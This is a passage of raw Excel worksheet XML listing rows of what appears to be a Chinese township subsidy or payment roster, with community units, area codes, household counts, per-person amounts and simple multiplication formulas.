      <c r="F1001" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1001" s="14">
        <v>1</v>
      </c>
      <c r="H1001" s="14">
        <v>340</v>
      </c>
      <c r="I1001" s="14">
        <f>H1001*G1001</f>
        <v>340</v>
      </c>
      <c r="J1001" s="24">
        <v>45108</v>
      </c>
      <c r="K1001" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1002" ht="23" customHeight="1" spans="1:11">
      <c r="A1002" s="13" t="s">
        <v>2660</v>
      </c>
      <c r="B1002" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1002" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1002" s="14" t="s">
        <v>2661</v>
      </c>
      <c r="E1002" s="14" t="s">
        <v>517</v>
      </c>
      <c r="F1002" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1002" s="14">
        <v>1</v>
      </c>
      <c r="H1002" s="14">
        <v>340</v>
      </c>
      <c r="I1002" s="14">
        <f>H1002*G1002</f>
        <v>340</v>
      </c>
      <c r="J1002" s="24">
        <v>45108</v>
      </c>
      <c r="K1002" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1003" ht="23" customHeight="1" spans="1:11">
      <c r="A1003" s="13" t="s">
        <v>2662</v>
      </c>
      <c r="B1003" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1003" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1003" s="14" t="s">
        <v>2663</v>
      </c>
      <c r="E1003" s="14" t="s">
        <v>637</v>
      </c>
      <c r="F1003" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1003" s="14">
        <v>1</v>
      </c>
      <c r="H1003" s="14">
        <v>340</v>
      </c>
      <c r="I1003" s="14">
        <f>H1003*G1003</f>
        <v>340</v>
      </c>
      <c r="J1003" s="24">
        <v>45108</v>
      </c>
      <c r="K1003" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1004" ht="23" customHeight="1" spans="1:11">
      <c r="A1004" s="13" t="s">
        <v>2664</v>
      </c>
      <c r="B1004" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1004" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1004" s="14" t="s">
        <v>2665</v>
      </c>
      <c r="E1004" s="14" t="s">
        <v>2666</v>
      </c>
      <c r="F1004" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1004" s="14">
        <v>2</v>
      </c>
      <c r="H1004" s="14">
        <v>300</v>
      </c>
      <c r="I1004" s="14">
        <f>H1004*G1004</f>
        <v>600</v>
      </c>
      <c r="J1004" s="24">
        <v>45108</v>
      </c>
      <c r="K1004" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1005" ht="23" customHeight="1" spans="1:11">
      <c r="A1005" s="13" t="s">
        <v>2667</v>
      </c>
      <c r="B1005" s="14" t="str">
        <f>B1004</f>
        <v>城关镇</v>
      </c>
      <c r="C1005" s="14" t="str">
        <f>C1004</f>
        <v>民主社区工信局</v>
      </c>
      <c r="D1005" s="18" t="s">
        <v>2668</v>
      </c>
      <c r="E1005" s="18" t="s">
        <v>2669</v>
      </c>
      <c r="F1005" s="14" t="str">
        <f>F1004</f>
        <v>4113210105</v>
      </c>
      <c r="G1005" s="14"/>
      <c r="H1005" s="14"/>
      <c r="I1005" s="14"/>
      <c r="J1005" s="24"/>
      <c r="K1005" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1006" ht="23" customHeight="1" spans="1:11">
      <c r="A1006" s="13" t="s">
        <v>2670</v>
      </c>
      <c r="B1006" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1006" s="14" t="s">
        <v>2671</v>
      </c>
      <c r="D1006" s="14" t="s">
        <v>2672</v>
      </c>
      <c r="E1006" s="14" t="s">
        <v>2673</v>
      </c>
      <c r="F1006" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1006" s="14">
        <v>1</v>
      </c>
      <c r="H1006" s="14">
        <v>340</v>
      </c>
      <c r="I1006" s="14">
        <f t="shared" ref="I1006:I1011" si="48">H1006*G1006</f>
        <v>340</v>
      </c>
      <c r="J1006" s="24">
        <v>45108</v>
      </c>
      <c r="K1006" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1007" ht="23" customHeight="1" spans="1:11">
      <c r="A1007" s="13" t="s">
        <v>2674</v>
      </c>
      <c r="B1007" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1007" s="14" t="s">
        <v>2675</v>
      </c>
      <c r="D1007" s="14" t="s">
        <v>2676</v>
      </c>
      <c r="E1007" s="14" t="s">
        <v>499</v>
      </c>
      <c r="F1007" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1007" s="14">
        <v>1</v>
      </c>
      <c r="H1007" s="14">
        <v>340</v>
      </c>
      <c r="I1007" s="14">
        <f t="shared" si="48"/>
        <v>340</v>
      </c>
      <c r="J1007" s="24">
        <v>45108</v>
      </c>
      <c r="K1007" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1008" ht="23" customHeight="1" spans="1:11">
      <c r="A1008" s="13" t="s">
        <v>2677</v>
      </c>
      <c r="B1008" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1008" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1008" s="14" t="s">
        <v>2678</v>
      </c>
      <c r="E1008" s="14" t="s">
        <v>2679</v>
      </c>
      <c r="F1008" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1008" s="14">
        <v>1</v>
      </c>
      <c r="H1008" s="14">
        <v>340</v>
      </c>
      <c r="I1008" s="14">
        <f t="shared" si="48"/>
        <v>340</v>
      </c>
      <c r="J1008" s="24">
        <v>45108</v>
      </c>
      <c r="K1008" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1009" ht="23" customHeight="1" spans="1:11">
      <c r="A1009" s="13" t="s">
        <v>2680</v>
      </c>
      <c r="B1009" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1009" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1009" s="14" t="s">
        <v>2200</v>
      </c>
      <c r="E1009" s="14" t="s">
        <v>551</v>
      </c>
      <c r="F1009" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1009" s="14">
        <v>1</v>
      </c>
      <c r="H1009" s="14">
        <v>500</v>
      </c>
      <c r="I1009" s="14">
        <f t="shared" si="48"/>
        <v>500</v>
      </c>
      <c r="J1009" s="24">
        <v>45108</v>
      </c>
      <c r="K1009" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1010" ht="23" customHeight="1" spans="1:11">
      <c r="A1010" s="13" t="s">
        <v>2681</v>
      </c>
      <c r="B1010" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1010" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1010" s="14" t="s">
        <v>2682</v>
      </c>
      <c r="E1010" s="14" t="s">
        <v>385</v>
      </c>
      <c r="F1010" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1010" s="14">
        <v>1</v>
      </c>
      <c r="H1010" s="14">
        <v>340</v>
      </c>
      <c r="I1010" s="14">
        <f t="shared" si="48"/>
        <v>340</v>
      </c>
      <c r="J1010" s="24">
        <v>45108</v>
      </c>
      <c r="K1010" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1011" ht="23" customHeight="1" spans="1:11">
      <c r="A1011" s="13" t="s">
        <v>2683</v>
      </c>
      <c r="B1011" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1011" s="14" t="s">
        <v>2684</v>
      </c>
      <c r="D1011" s="14" t="s">
        <v>2685</v>
      </c>
      <c r="E1011" s="14" t="s">
        <v>292</v>
      </c>
      <c r="F1011" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1011" s="14">
        <v>2</v>
      </c>
      <c r="H1011" s="14">
        <v>300</v>
      </c>
      <c r="I1011" s="14">
        <f t="shared" si="48"/>
        <v>600</v>
      </c>
      <c r="J1011" s="24">
        <v>45108</v>
      </c>
      <c r="K1011" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1012" ht="23" customHeight="1" spans="1:11">
      <c r="A1012" s="13" t="s">
        <v>2686</v>
      </c>
      <c r="B1012" s="14" t="str">
        <f>B1011</f>
        <v>城关镇</v>
      </c>
      <c r="C1012" s="14" t="str">
        <f>C1011</f>
        <v>民主社区县社</v>
      </c>
      <c r="D1012" s="19" t="s">
        <v>2687</v>
      </c>
      <c r="E1012" s="20" t="s">
        <v>2002</v>
      </c>
      <c r="F1012" s="14" t="str">
        <f>F1011</f>
        <v>4113210105</v>
      </c>
      <c r="G1012" s="14"/>
      <c r="H1012" s="14"/>
      <c r="I1012" s="14"/>
      <c r="J1012" s="24"/>
      <c r="K1012" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1013" ht="23" customHeight="1" spans="1:11">
      <c r="A1013" s="13" t="s">
        <v>2688</v>
      </c>
      <c r="B1013" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1013" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1013" s="14" t="s">
        <v>2689</v>
      </c>
      <c r="E1013" s="14" t="s">
        <v>880</v>
      </c>
      <c r="F1013" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1013" s="14">
        <v>1</v>
      </c>
      <c r="H1013" s="14">
        <v>340</v>
      </c>
      <c r="I1013" s="14">
        <f t="shared" ref="I1013:I1021" si="49">H1013*G1013</f>
        <v>340</v>
      </c>
      <c r="J1013" s="24">
        <v>45108</v>
      </c>
      <c r="K1013" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1014" ht="23" customHeight="1" spans="1:11">
      <c r="A1014" s="13" t="s">
        <v>2690</v>
      </c>
      <c r="B1014" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1014" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1014" s="14" t="s">
        <v>2691</v>
      </c>
      <c r="E1014" s="14" t="s">
        <v>232</v>
      </c>
      <c r="F1014" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1014" s="14">
        <v>1</v>
      </c>
      <c r="H1014" s="14">
        <v>340</v>
      </c>
      <c r="I1014" s="14">
        <f t="shared" si="49"/>
        <v>340</v>
      </c>
      <c r="J1014" s="24">
        <v>45108</v>
      </c>
      <c r="K1014" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1015" ht="23" customHeight="1" spans="1:11">
      <c r="A1015" s="13" t="s">
        <v>2692</v>
      </c>
      <c r="B1015" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1015" s="14" t="s">
        <v>2650</v>
      </c>
      <c r="D1015" s="14" t="s">
        <v>2693</v>
      </c>
      <c r="E1015" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F1015" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1015" s="14">
        <v>1</v>
      </c>
      <c r="H1015" s="14">
        <v>340</v>
      </c>
      <c r="I1015" s="14">
        <f t="shared" si="49"/>
        <v>340</v>
      </c>
      <c r="J1015" s="24">
        <v>45108</v>
      </c>
      <c r="K1015" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1016" ht="23" customHeight="1" spans="1:11">
      <c r="A1016" s="13" t="s">
        <v>2694</v>
      </c>
      <c r="B1016" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1016" s="14" t="s">
        <v>2671</v>
      </c>
      <c r="D1016" s="14" t="s">
        <v>2695</v>
      </c>
      <c r="E1016" s="14" t="s">
        <v>2696</v>
      </c>
      <c r="F1016" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1016" s="14">
        <v>1</v>
      </c>
      <c r="H1016" s="14">
        <v>340</v>
      </c>
      <c r="I1016" s="14">
        <f t="shared" si="49"/>
        <v>340</v>
      </c>
      <c r="J1016" s="24">
        <v>45108</v>
      </c>
      <c r="K1016" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1017" ht="23" customHeight="1" spans="1:11">
      <c r="A1017" s="13" t="s">
        <v>2697</v>
      </c>
      <c r="B1017" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1017" s="14" t="s">
        <v>2684</v>
      </c>
      <c r="D1017" s="14" t="s">
        <v>2698</v>
      </c>
      <c r="E1017" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F1017" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1017" s="14">
        <v>1</v>
      </c>
      <c r="H1017" s="14">
        <v>340</v>
      </c>
      <c r="I1017" s="14">
        <f t="shared" si="49"/>
        <v>340</v>
      </c>
      <c r="J1017" s="24">
        <v>45108</v>
      </c>
      <c r="K1017" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1018" ht="23" customHeight="1" spans="1:11">
      <c r="A1018" s="13" t="s">
        <v>2699</v>
      </c>
      <c r="B1018" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1018" s="14" t="s">
        <v>2671</v>
      </c>
      <c r="D1018" s="14" t="s">
        <v>2700</v>
      </c>
      <c r="E1018" s="14" t="s">
        <v>265</v>
      </c>
      <c r="F1018" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1018" s="14">
        <v>1</v>
      </c>
      <c r="H1018" s="14">
        <v>340</v>
      </c>
      <c r="I1018" s="14">
        <f t="shared" si="49"/>
        <v>340</v>
      </c>
      <c r="J1018" s="24">
        <v>45108</v>
      </c>
      <c r="K1018" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1019" ht="23" customHeight="1" spans="1:11">
      <c r="A1019" s="13" t="s">
        <v>2701</v>
      </c>
      <c r="B1019" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1019" s="14" t="s">
        <v>2671</v>
      </c>
      <c r="D1019" s="14" t="s">
        <v>2702</v>
      </c>
      <c r="E1019" s="14" t="s">
        <v>2703</v>
      </c>
      <c r="F1019" s="14" t="s">
        <v>2648</v>
      </c>
      <c r="G1019" s="14">
        <v>1</v>
      </c>
      <c r="H1019" s="14">
        <v>340</v>
      </c>
      <c r="I1019" s="14">
        <f t="shared" si="49"/>
        <v>340</v>
      </c>
      <c r="J1019" s="24">
        <v>45108</v>
      </c>
      <c r="K1019" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1020" ht="23" customHeight="1" spans="1:11">
      <c r="A1020" s="13" t="s">
        <v>2704</v>
      </c>
      <c r="B1020" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1020" s="14" t="s">
        <v>2705</v>
      </c>
      <c r="D1020" s="14" t="s">
        <v>2706</v>
      </c>
      <c r="E1020" s="14" t="s">
        <v>2707</v>
      </c>
      <c r="F1020" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1020" s="14">
        <v>1</v>
      </c>
      <c r="H1020" s="14">
        <v>340</v>
      </c>
      <c r="I1020" s="14">
        <f t="shared" si="49"/>
        <v>340</v>
      </c>
      <c r="J1020" s="24">
        <v>45108</v>
      </c>
      <c r="K1020" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1021" ht="23" customHeight="1" spans="1:11">
      <c r="A1021" s="13" t="s">
        <v>2708</v>
      </c>
      <c r="B1021" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1021" s="14" t="s">
        <v>2709</v>
      </c>
      <c r="D1021" s="14" t="s">
        <v>2710</v>
      </c>
      <c r="E1021" s="14" t="s">
        <v>222</v>
      </c>
      <c r="F1021" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1021" s="14">
        <v>2</v>
      </c>
      <c r="H1021" s="14">
        <v>300</v>
      </c>
      <c r="I1021" s="14">
        <f t="shared" si="49"/>
        <v>600</v>
      </c>
      <c r="J1021" s="24">
        <v>45108</v>
      </c>
      <c r="K1021" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1022" ht="23" customHeight="1" spans="1:11">
      <c r="A1022" s="13" t="s">
        <v>2711</v>
      </c>
      <c r="B1022" s="14" t="str">
        <f>B1021</f>
        <v>城关镇</v>
      </c>
      <c r="C1022" s="14" t="str">
        <f>C1021</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D1022" s="13" t="s">
        <v>2712</v>
      </c>
      <c r="E1022" s="13" t="s">
        <v>2713</v>
      </c>
      <c r="F1022" s="14" t="str">
        <f>F1021</f>
        <v>4113210102</v>
      </c>
      <c r="G1022" s="14"/>
      <c r="H1022" s="14"/>
      <c r="I1022" s="14"/>
      <c r="J1022" s="24"/>
      <c r="K1022" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1023" ht="23" customHeight="1" spans="1:11">
      <c r="A1023" s="13" t="s">
        <v>2714</v>
      </c>
      <c r="B1023" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1023" s="14" t="s">
        <v>2715</v>
      </c>
      <c r="D1023" s="14" t="s">
        <v>2716</v>
      </c>
      <c r="E1023" s="14" t="s">
        <v>337</v>
      </c>
      <c r="F1023" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1023" s="14">
        <v>1</v>
      </c>
      <c r="H1023" s="14">
        <v>340</v>
      </c>
      <c r="I1023" s="14">
        <f>H1023*G1023</f>
        <v>340</v>
      </c>
      <c r="J1023" s="24">
        <v>45108</v>
      </c>
      <c r="K1023" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1024" ht="23" customHeight="1" spans="1:11">
      <c r="A1024" s="13" t="s">
        <v>2717</v>
      </c>
      <c r="B1024" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1024" s="14" t="s">
        <v>2718</v>
      </c>
      <c r="D1024" s="14" t="s">
        <v>2719</v>
      </c>
      <c r="E1024" s="14" t="s">
        <v>621</v>
      </c>
      <c r="F1024" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1024" s="14">
        <v>1</v>
      </c>
      <c r="H1024" s="14">
        <v>340</v>
      </c>
      <c r="I1024" s="14">
        <f>H1024*G1024</f>
        <v>340</v>
      </c>
      <c r="J1024" s="24">
        <v>45108</v>
      </c>
      <c r="K1024" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1025" ht="23" customHeight="1" spans="1:11">
      <c r="A1025" s="13" t="s">
        <v>2720</v>
      </c>
      <c r="B1025" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1025" s="14" t="s">
        <v>2705</v>
      </c>
      <c r="D1025" s="14" t="s">
        <v>1717</v>
      </c>
      <c r="E1025" s="14" t="s">
        <v>2721</v>
      </c>
      <c r="F1025" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1025" s="14">
        <v>1</v>
      </c>
      <c r="H1025" s="14">
        <v>340</v>
      </c>
      <c r="I1025" s="14">
        <f>H1025*G1025</f>
        <v>340</v>
      </c>
      <c r="J1025" s="24">
        <v>45108</v>
      </c>
      <c r="K1025" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1026" ht="23" customHeight="1" spans="1:11">
      <c r="A1026" s="13" t="s">
        <v>2722</v>
      </c>
      <c r="B1026" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1026" s="14" t="s">
        <v>2705</v>
      </c>
      <c r="D1026" s="14" t="s">
        <v>2723</v>
      </c>
      <c r="E1026" s="14" t="s">
        <v>435</v>
      </c>
      <c r="F1026" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1026" s="14">
        <v>1</v>
      </c>
      <c r="H1026" s="14">
        <v>340</v>
      </c>
      <c r="I1026" s="14">
        <f>H1026*G1026</f>
        <v>340</v>
      </c>
      <c r="J1026" s="24">
        <v>45108</v>
      </c>
      <c r="K1026" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1027" ht="23" customHeight="1" spans="1:11">
      <c r="A1027" s="13" t="s">
        <v>2724</v>
      </c>
      <c r="B1027" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1027" s="14" t="s">
        <v>2709</v>
      </c>
      <c r="D1027" s="14" t="s">
        <v>2725</v>
      </c>
      <c r="E1027" s="14" t="s">
        <v>569</v>
      </c>
      <c r="F1027" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1027" s="14">
        <v>2</v>
      </c>
      <c r="H1027" s="14">
        <v>300</v>
      </c>
      <c r="I1027" s="14">
        <f>H1027*G1027</f>
        <v>600</v>
      </c>
      <c r="J1027" s="24">
        <v>45108</v>
      </c>
      <c r="K1027" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1028" ht="23" customHeight="1" spans="1:11">
      <c r="A1028" s="13" t="s">
        <v>2726</v>
      </c>
      <c r="B1028" s="14" t="str">
        <f>B1027</f>
        <v>城关镇</v>
      </c>
      <c r="C1028" s="14" t="str">
        <f>C1027</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D1028" s="13" t="s">
        <v>2727</v>
      </c>
      <c r="E1028" s="13" t="s">
        <v>2728</v>
      </c>
      <c r="F1028" s="14" t="str">
        <f>F1027</f>
        <v>4113210102</v>
      </c>
      <c r="G1028" s="14"/>
      <c r="H1028" s="14"/>
      <c r="I1028" s="14"/>
      <c r="J1028" s="24"/>
      <c r="K1028" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1029" ht="23" customHeight="1" spans="1:11">
      <c r="A1029" s="13" t="s">
        <v>2729</v>
      </c>
      <c r="B1029" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1029" s="14" t="s">
        <v>2709</v>
      </c>
      <c r="D1029" s="14" t="s">
        <v>2730</v>
      </c>
      <c r="E1029" s="14" t="s">
        <v>709</v>
      </c>
      <c r="F1029" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1029" s="14">
        <v>1</v>
      </c>
      <c r="H1029" s="14">
        <v>340</v>
      </c>
      <c r="I1029" s="14">
        <f>H1029*G1029</f>
        <v>340</v>
      </c>
      <c r="J1029" s="24">
        <v>45108</v>
      </c>
      <c r="K1029" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1030" ht="23" customHeight="1" spans="1:11">
      <c r="A1030" s="13" t="s">
        <v>2731</v>
      </c>
      <c r="B1030" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1030" s="14" t="s">
        <v>2709</v>
      </c>
      <c r="D1030" s="14" t="s">
        <v>2732</v>
      </c>
      <c r="E1030" s="14" t="s">
        <v>303</v>
      </c>
      <c r="F1030" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1030" s="14">
        <v>1</v>
      </c>
      <c r="H1030" s="14">
        <v>340</v>
      </c>
      <c r="I1030" s="14">
        <f>H1030*G1030</f>
        <v>340</v>
      </c>
      <c r="J1030" s="24">
        <v>45108</v>
      </c>
      <c r="K1030" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1031" ht="23" customHeight="1" spans="1:11">
      <c r="A1031" s="13" t="s">
        <v>2733</v>
      </c>
      <c r="B1031" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1031" s="14" t="s">
        <v>2709</v>
      </c>
      <c r="D1031" s="14" t="s">
        <v>2734</v>
      </c>
      <c r="E1031" s="14" t="s">
        <v>2735</v>
      </c>
      <c r="F1031" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1031" s="14">
        <v>2</v>
      </c>
      <c r="H1031" s="14">
        <v>300</v>
      </c>
      <c r="I1031" s="14">
        <f>H1031*G1031</f>
        <v>600</v>
      </c>
      <c r="J1031" s="24">
        <v>45108</v>
      </c>
      <c r="K1031" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1032" ht="23" customHeight="1" spans="1:11">
      <c r="A1032" s="13" t="s">
        <v>2736</v>
      </c>
      <c r="B1032" s="14" t="str">
        <f>B1031</f>
        <v>城关镇</v>
      </c>
      <c r="C1032" s="14" t="str">
        <f>C1031</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D1032" s="13" t="s">
        <v>2737</v>
      </c>
      <c r="E1032" s="13" t="s">
        <v>2738</v>
      </c>
      <c r="F1032" s="14" t="str">
        <f>F1031</f>
        <v>4113210102</v>
      </c>
      <c r="G1032" s="14"/>
      <c r="H1032" s="14"/>
      <c r="I1032" s="14"/>
      <c r="J1032" s="24"/>
      <c r="K1032" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1033" ht="23" customHeight="1" spans="1:11">
      <c r="A1033" s="13" t="s">
        <v>2739</v>
      </c>
      <c r="B1033" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1033" s="14" t="s">
        <v>2709</v>
      </c>
      <c r="D1033" s="14" t="s">
        <v>2740</v>
      </c>
      <c r="E1033" s="14" t="s">
        <v>2741</v>
      </c>
      <c r="F1033" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1033" s="14">
        <v>1</v>
      </c>
      <c r="H1033" s="14">
        <v>340</v>
      </c>
      <c r="I1033" s="14">
        <f>H1033*G1033</f>
        <v>340</v>
      </c>
      <c r="J1033" s="24">
        <v>45108</v>
      </c>
      <c r="K1033" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1034" ht="23" customHeight="1" spans="1:11">
      <c r="A1034" s="13" t="s">
        <v>2742</v>
      </c>
      <c r="B1034" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1034" s="14" t="s">
        <v>2709</v>
      </c>
      <c r="D1034" s="14" t="s">
        <v>2743</v>
      </c>
      <c r="E1034" s="14" t="s">
        <v>281</v>
      </c>
      <c r="F1034" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1034" s="14">
        <v>2</v>
      </c>
      <c r="H1034" s="14">
        <v>300</v>
      </c>
      <c r="I1034" s="14">
        <f>H1034*G1034</f>
        <v>600</v>
      </c>
      <c r="J1034" s="24">
        <v>45108</v>
      </c>
      <c r="K1034" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1035" ht="23" customHeight="1" spans="1:11">
      <c r="A1035" s="13" t="s">
        <v>2744</v>
      </c>
      <c r="B1035" s="14" t="str">
        <f>B1034</f>
        <v>城关镇</v>
      </c>
      <c r="C1035" s="14" t="str">
        <f>C1034</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D1035" s="19" t="s">
        <v>2745</v>
      </c>
      <c r="E1035" s="19" t="s">
        <v>2746</v>
      </c>
      <c r="F1035" s="14" t="str">
        <f>F1034</f>
        <v>4113210102</v>
      </c>
      <c r="G1035" s="14"/>
      <c r="H1035" s="14"/>
      <c r="I1035" s="14"/>
      <c r="J1035" s="24"/>
      <c r="K1035" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1036" ht="23" customHeight="1" spans="1:11">
      <c r="A1036" s="13" t="s">
        <v>2747</v>
      </c>
      <c r="B1036" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1036" s="14" t="s">
        <v>2709</v>
      </c>
      <c r="D1036" s="14" t="s">
        <v>2748</v>
      </c>
      <c r="E1036" s="14" t="s">
        <v>1486</v>
      </c>
      <c r="F1036" s="14" t="s">
        <v>289</v>
      </c>
      <c r="G1036" s="14">
        <v>2</v>
      </c>
      <c r="H1036" s="14">
        <v>300</v>
      </c>
      <c r="I1036" s="14">
        <f>H1036*G1036</f>
        <v>600</v>
      </c>
      <c r="J1036" s="24">
        <v>45108</v>
      </c>
      <c r="K1036" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1037" ht="23" customHeight="1" spans="1:11">
      <c r="A1037" s="13" t="s">
        <v>2749</v>
      </c>
      <c r="B1037" s="14" t="str">
        <f>B1036</f>
        <v>城关镇</v>
      </c>
      <c r="C1037" s="14" t="str">
        <f>C1036</f>
        <v>北外社区工信局</v>
      </c>
      <c r="D1037" s="18" t="s">
        <v>2750</v>
      </c>
      <c r="E1037" s="18" t="s">
        <v>2330</v>
      </c>
      <c r="F1037" s="14" t="str">
        <f>F1036</f>
        <v>4113210102</v>
      </c>
      <c r="G1037" s="14"/>
      <c r="H1037" s="14"/>
      <c r="I1037" s="14"/>
      <c r="J1037" s="24"/>
      <c r="K1037" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1038" ht="23" customHeight="1" spans="1:11">
      <c r="A1038" s="13" t="s">
        <v>2751</v>
      </c>
      <c r="B1038" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1038" s="14" t="s">
        <v>2071</v>
      </c>
      <c r="D1038" s="14" t="s">
        <v>2752</v>
      </c>
      <c r="E1038" s="14" t="s">
        <v>438</v>
      </c>
      <c r="F1038" s="14" t="s">
        <v>266</v>
      </c>
      <c r="G1038" s="14">
        <v>1</v>
      </c>
      <c r="H1038" s="14">
        <v>340</v>
      </c>
      <c r="I1038" s="14">
        <f>H1038*G1038</f>
        <v>340</v>
      </c>
      <c r="J1038" s="24">
        <v>45108</v>
      </c>
      <c r="K1038" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1039" ht="23" customHeight="1" spans="1:11">
      <c r="A1039" s="13" t="s">
        <v>2753</v>
      </c>
      <c r="B1039" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1039" s="14" t="s">
        <v>2077</v>
      </c>
      <c r="D1039" s="14" t="s">
        <v>2754</v>
      </c>
      <c r="E1039" s="14" t="s">
        <v>1281</v>
      </c>
      <c r="F1039" s="14" t="s">
        <v>223</v>
      </c>
      <c r="G1039" s="14">
        <v>1</v>
      </c>
      <c r="H1039" s="14">
        <v>340</v>
      </c>
      <c r="I1039" s="14">
        <f>H1039*G1039</f>
        <v>340</v>
      </c>
      <c r="J1039" s="24">
        <v>45108</v>
      </c>
      <c r="K1039" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1040" ht="23" customHeight="1" spans="1:11">
      <c r="A1040" s="13" t="s">
        <v>2755</v>
      </c>
      <c r="B1040" s="14" t="s">
        <v>219</v>
      </c>
      <c r="C1040" s="14" t="s">
        <v>2074</v>
      </c>
